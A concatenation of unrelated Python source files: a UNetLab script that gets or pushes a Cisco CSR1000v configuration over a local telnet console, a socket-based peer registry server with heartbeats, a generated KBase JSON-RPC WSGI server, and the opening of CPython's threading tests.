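    #   service = MatchmakerService(
    #       matchmaker=RoundRobinMatchMaker(),
    #       gamedb=FirestoreDB(json_config_path=json_config_path),
    #       region='US')
    #   service.start_matchmaker_daemon(sleep_seconds=60)
    #   ...
    #   service.set_stop()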
def clear_stop(self):
self._stop.clear()
log_message(
"Cleared stop signal for matchmaker in region={}".format(self._region))
|
config_csr1000v.py
|
#!/usr/bin/env python3
# scripts/config_csr1000v.py
#
# Import/Export script for CSR1000v.
#
# @author Andrea Dainese <andrea.dainese@gmail.com>
# @copyright 2014-2016 Andrea Dainese
# @license BSD-3-Clause https://github.com/dainok/unetlab/blob/master/LICENSE
# @link http://www.unetlab.com/
# @version 20160719
import getopt, multiprocessing, os, pexpect, re, sys, time
username = 'cisco'
password = 'cisco'
secret = 'cisco'
conntimeout = 3 # Maximum time for console connection
expctimeout = 3 # Maximum time for each short expect
longtimeout = 30 # Maximum time for each long expect
timeout = 60 # Maximum run time (conntimeout is included)
def node_login(handler):
# Send an empty line, and wait for the login prompt
i = -1
while i == -1:
try:
handler.sendline('\r\n')
i = handler.expect([
'Username:',
'\(config',
'>',
'#',
'Would you like to enter the'], timeout = 5)
except:
i = -1
if i == 0:
# Need to send username and password
handler.sendline(username)
try:
handler.expect('Password:', timeout = expctimeout)
except:
print('ERROR: error waiting for "Password:" prompt.')
node_quit(handler)
return False
handler.sendline(password)
try:
j = handler.expect(['>', '#'], timeout = expctimeout)
except:
print('ERROR: error waiting for [">", "#"] prompt.')
node_quit(handler)
return False
if j == 0:
# Secret password required
handler.sendline(secret)
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif j == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
elif i == 1:
# Config mode detected, need to exit
handler.sendline('end')
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif i == 2:
# Need higher privilege
handler.sendline('enable')
try:
j = handler.expect(['Password:', '#'])
except:
print('ERROR: error waiting for ["Password:", "#"] prompt.')
node_quit(handler)
return False
if j == 0:
            # Need to provide secret
handler.sendline(secret)
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif j == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
elif i == 3:
# Nothing to do
return True
elif i == 4:
# First boot detected
handler.sendline('no')
try:
handler.expect('Press RETURN to get started', timeout = longtimeout)
except:
print('ERROR: error waiting for "Press RETURN to get started" prompt.')
node_quit(handler)
return False
handler.sendline('\r\n')
try:
handler.expect('Router>', timeout = expctimeout)
except:
            print('ERROR: error waiting for "Router>" prompt.')
node_quit(handler)
return False
handler.sendline('enable')
try:
handler.expect('Router#', timeout = expctimeout)
except:
            print('ERROR: error waiting for "Router#" prompt.')
node_quit(handler)
return False
return True
else:
# Unexpected output
node_quit(handler)
return False
def node_quit(handler):
if handler.isalive() == True:
handler.sendline('quit\n')
handler.close()
def config_get(handler):
# Clearing all "expect" buffer
while True:
try:
handler.expect('#', timeout = 0.1)
except:
break
# Disable paging
handler.sendline('terminal length 0')
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
# Getting the config
handler.sendline('more system:running-config')
try:
handler.expect('#', timeout = longtimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
config = handler.before.decode()
# Manipulating the config
config = re.sub('\r', '', config, flags=re.DOTALL) # Unix style
config = re.sub('.*Using [0-9]+ out of [0-9]+ bytes\n', '', config, flags=re.DOTALL) # Header
config = re.sub('.*more system:running-config\n', '', config, flags=re.DOTALL) # Header
config = re.sub('!\nend.*', '!\nend\n', config, flags=re.DOTALL) # Footer
return config
def config_put(handler):
while True:
try:
i = handler.expect('CVAC-4-CONFIG_DONE', timeout)
except:
return False
return True
def usage():
    print('Usage: %s <standard options>' % (sys.argv[0]))
    print('Standard Options:')
    print('-a <s> *Action can be:')
    print(' - get: get the startup-configuration and push it to a file')
    print(' - put: put the file as startup-configuration')
    print('-f <s> *File')
    print('-p <n> *Console port')
    print('-t <n> Timeout (default = %i)' % (timeout))
    print('* Mandatory option')
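# Example invocations (illustrative; the port and file path are placeholders):
#   ./config_csr1000v.py -a get -p 32769 -f /tmp/csr1000v_startup.cfg -t 120
#   ./config_csr1000v.py -a put -p 32769 -f /tmp/csr1000v_startup.cfg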
def now():
# Return current UNIX time in milliseconds
return int(round(time.time() * 1000))
def main(action, filename, port):
try:
# Connect to the device
tmp = conntimeout
while (tmp > 0):
handler = pexpect.spawn('telnet 127.0.0.1 %i' %(port))
time.sleep(0.1)
tmp = tmp - 0.1
if handler.isalive() == True:
break
if (handler.isalive() != True):
print('ERROR: cannot connect to port "%i".' %(port))
node_quit(handler)
sys.exit(1)
if action == 'get':
# Login to the device and get a privileged prompt
rc = node_login(handler)
if rc != True:
print('ERROR: failed to login.')
node_quit(handler)
sys.exit(1)
config = config_get(handler)
if config in [False, None]:
print('ERROR: failed to retrieve config.')
node_quit(handler)
sys.exit(1)
try:
fd = open(filename, 'a')
fd.write(config)
fd.close()
except:
print('ERROR: cannot write config to file.')
node_quit(handler)
sys.exit(1)
elif action == 'put':
rc = config_put(handler)
if rc != True:
print('ERROR: failed to push config.')
node_quit(handler)
sys.exit(1)
# Remove lock file
lock = '%s/.lock' %(os.path.dirname(filename))
if os.path.exists(lock):
os.remove(lock)
# Mark as configured
configured = '%s/.configured' %(os.path.dirname(filename))
if not os.path.exists(configured):
open(configured, 'a').close()
node_quit(handler)
sys.exit(0)
except Exception as e:
print('ERROR: got an exception')
print(type(e)) # the exception instance
print(e.args) # arguments stored in .args
print(e) # __str__ allows args to be printed directly,
node_quit(handler)
return False
if __name__ == "__main__":
action = None
filename = None
port = None
# Getting parameters from command line
try:
opts, args = getopt.getopt(sys.argv[1:], 'a:p:t:f:', ['action=', 'port=', 'timeout=', 'file='])
except getopt.GetoptError as e:
usage()
sys.exit(3)
for o, a in opts:
if o in ('-a', '--action'):
action = a
elif o in ('-f', '--file'):
filename = a
elif o in ('-p', '--port'):
try:
port = int(a)
except:
port = -1
elif o in ('-t', '--timeout'):
try:
timeout = int(a)
except:
timeout = -1
else:
print('ERROR: invalid parameter.')
# Checking mandatory parameters
if action == None or port == None or filename == None:
usage()
print('ERROR: missing mandatory parameters.')
sys.exit(1)
if action not in ['get', 'put']:
usage()
print('ERROR: invalid action.')
sys.exit(1)
if timeout < 0:
usage()
print('ERROR: timeout must be 0 or higher.')
sys.exit(1)
if port < 32768:
usage()
print('ERROR: port must be 32768 or higher.')
sys.exit(1)
if action == 'get' and os.path.exists(filename):
usage()
print('ERROR: destination file already exists.')
sys.exit(1)
if action == 'put' and not os.path.exists(filename):
usage()
    print('ERROR: source file does not exist.')
sys.exit(1)
if action == 'put':
try:
fd = open(filename, 'r')
config = fd.read()
fd.close()
except:
usage()
print('ERROR: cannot read from file.')
sys.exit(1)
# Backgrounding the script
end_before = now() + timeout * 1000
p = multiprocessing.Process(target=main, name="Main", args=(action, filename, port))
p.start()
while (p.is_alive() and now() < end_before):
# Waiting for the child process to end
time.sleep(1)
if p.is_alive():
# Timeout occurred
print('ERROR: timeout occurred.')
p.terminate()
sys.exit(127)
if p.exitcode != 0:
sys.exit(127)
sys.exit(0)
|
Keeper.py
|
import socket
import argparse
import threading
import re
import pickle
import time
from colorama import Fore, Style
from argparse import RawTextHelpFormatter
styleKeeper = Fore.CYAN + Style.BRIGHT
styleHeartbeat = Fore.RED + Style.BRIGHT
class Keeper():
def __init__(self, ip, port):
        '''
        Constructor for the centralized server (Keeper) class.
        :param ip: IP address the server binds to
        :param port: TCP port the server listens on
        '''
self.ip = ip
self.port = port
self.clients = ([], [])
self.clientsSockets = []
def show_clients(self):
global styleKeeper
print(styleKeeper + '\nUsers:')
print(styleKeeper + '\tMiners:')
for miner in self.clients[0]:
print(styleKeeper + '\t\t{}'.format(miner))
print(styleKeeper + '\tTraders:')
for trader in self.clients[1]:
print(styleKeeper + '\t\t{}'.format(trader))
@property
def listClients(self):
return self.clients[0] + self.clients[1]
@property
def ip(self):
return self._ip
@property
def port(self):
return self._port
@ip.setter
def ip(self, ip):
self._ip = ip
@port.setter
def port(self, port):
self._port = port
def heartbeat(self):
global styleHeartbeat
while True:
flag_dead = False
deads = []
time.sleep(1)
print(styleHeartbeat + '\nInitializing Heartbeat on clients:')
for ip in self.listClients:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(ip)
sock.send(b'UAlive?')
msg = sock.recv(1024)
if msg:
print(styleHeartbeat + '\t{} still alive :)'.format(ip))
else:
print(styleHeartbeat + '\t{} is dead :X'.format(ip))
deads.append(ip)
self.remove_client(ip)
flag_dead = True
except (ConnectionRefusedError, ConnectionResetError):
print(styleHeartbeat + '\t{} is dead :X'.format(ip))
deads.append(ip)
self.remove_client(ip)
flag_dead = True
for dead in deads:
self.notify_ip(dead, 'DEAD')
if flag_dead:
self.show_clients()
flag_dead = False
def remove_client(self, client):
if client in self.clients[0]:
self.clients[0].remove(client)
if client in self.clients[1]:
self.clients[1].remove(client)
def notify_ip(self, address, case):
global styleKeeper
for ip in self.listClients:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(ip)
if re.search('DEAD', case):
sock.send(b'DEAD')
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
sock.send(pickle.dumps(address))
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
print(styleKeeper +
'\tClient {} notified for dead client'.format(ip))
if re.search('NEWMiner', case):
sock.send(b'NEWMiner')
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
sock.send(pickle.dumps(address))
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
print(styleKeeper + '\t\tsent to {}'.format(ip))
if re.search('NEWTrader', case):
sock.send(b'NEWTrader')
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
sock.send(pickle.dumps(address))
msg = sock.recv(1024)
if re.search('Ok', msg.decode('utf-8')):
print(styleKeeper + '\t\tsent to {}'.format(ip))
sock.close()
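    # Wire protocol used by notify_ip above (as implemented): send the case
    # keyword (b'DEAD' / b'NEWMiner' / b'NEWTrader'), wait for b'Ok', then send
    # the pickled (ip, port) address and wait for a final b'Ok'.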
def connected(self, conn, addr):
global styleKeeper
ip = addr[0]
while True:
msg = conn.recv(1024)
try:
if re.search('NEWMiner', msg.decode('utf-8')):
conn.send(b'Ok')
serverPort = conn.recv(1024)
print(styleKeeper + '\tNew Miner {}'.format((ip, serverPort)))
self.notify_ip((ip, int(serverPort)), 'NEWMiner')
self.clients[0].append((ip, int(serverPort)))
conn.send(b'Ok')
elif re.search('NEWTrader', msg.decode('utf-8')):
conn.send(b'Ok')
serverPort = conn.recv(1024)
print(
styleKeeper + '\tNew Trader {}'.format((ip, serverPort)))
self.notify_ip((ip, int(serverPort)), 'NEWTrader')
self.clients[1].append((ip, int(serverPort)))
conn.send(b'Ok')
if re.search('GiveMeUsers', msg.decode('utf-8')):
conn.send(pickle.dumps(self.clients))
break
except:
pass
self.show_clients()
def start_server(self):
global styleKeeper
try:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
server.bind((self.ip, self.port))
server.listen(10)
print(styleKeeper + "Server Running on port {}\n".format(self.port))
except:
                print(styleKeeper + "Error starting server - could not bind port!\n")
thread_heartbeat = threading.Thread(target=self.heartbeat, args=())
thread_heartbeat.start()
try:
while True:
conn, addr = server.accept()
print(
styleKeeper + "New connection from {} with port {}:".format(addr[0], addr[1]))
thread = threading.Thread(
target=self.connected, args=(conn, addr))
thread.start()
except:
server.close()
print(styleKeeper + "Ending the execution of server - No messages!\n")
except (KeyboardInterrupt, SystemExit):
print(styleKeeper + "Finishing the execution of server...\n")
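# Usage sketch (illustrative; the address and port are placeholders):
#   keeper = Keeper('127.0.0.1', 5000)
#   keeper.start_server()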
|
kb_assembly_compareServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_assembly_compare.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_assembly_compare'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_assembly_compare.kb_assembly_compareImpl import kb_assembly_compare # noqa @IgnorePep8
impl_kb_assembly_compare = kb_assembly_compare(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
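# Example (illustrative): json.dumps({'refs': set(['a', 'b'])}, cls=JSONObjectEncoder)
# serializes sets and frozensets as JSON lists via the encoder above.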
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_assembly_compare'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_assembly_compare.run_filter_contigs_by_length,
name='kb_assembly_compare.run_filter_contigs_by_length',
types=[dict])
self.method_authentication['kb_assembly_compare.run_filter_contigs_by_length'] = 'required' # noqa
self.rpc_service.add(impl_kb_assembly_compare.run_contig_distribution_compare,
name='kb_assembly_compare.run_contig_distribution_compare',
types=[dict])
self.method_authentication['kb_assembly_compare.run_contig_distribution_compare'] = 'required' # noqa
self.rpc_service.add(impl_kb_assembly_compare.run_benchmark_assemblies_against_genomes_with_MUMmer4,
name='kb_assembly_compare.run_benchmark_assemblies_against_genomes_with_MUMmer4',
types=[dict])
self.method_authentication['kb_assembly_compare.run_benchmark_assemblies_against_genomes_with_MUMmer4'] = 'required' # noqa
self.rpc_service.add(impl_kb_assembly_compare.status,
name='kb_assembly_compare.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_assembly_compare ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP service
# listening on port 9999 by default, execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, this will start the server on localhost on a system-assigned
    port in the main thread. Execution of the main thread will stay in the
    server main loop until interrupted. To run the server in a separate
    process, and thus allow the stop_server method to be called, set
    newprocess = True. This will also allow the port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
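# Usage sketch (illustrative): run the service in a background process and shut
# it down afterwards. Assumes a valid KB_DEPLOYMENT_CONFIG environment is set up
# for the auth client and logging.
#   port = start_server(newprocess=True)
#   ... POST JSON-RPC requests to http://localhost:<port>/ ...
#   stop_server()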
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
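# Usage sketch (illustrative; the paths are placeholders): handle a single
# JSON-RPC request from disk without starting the HTTP server.
#   exit_code = process_async_cli('/tmp/input.json', '/tmp/output.json', None)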
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, import_module, cpython_only, unlink
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
import traceback
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
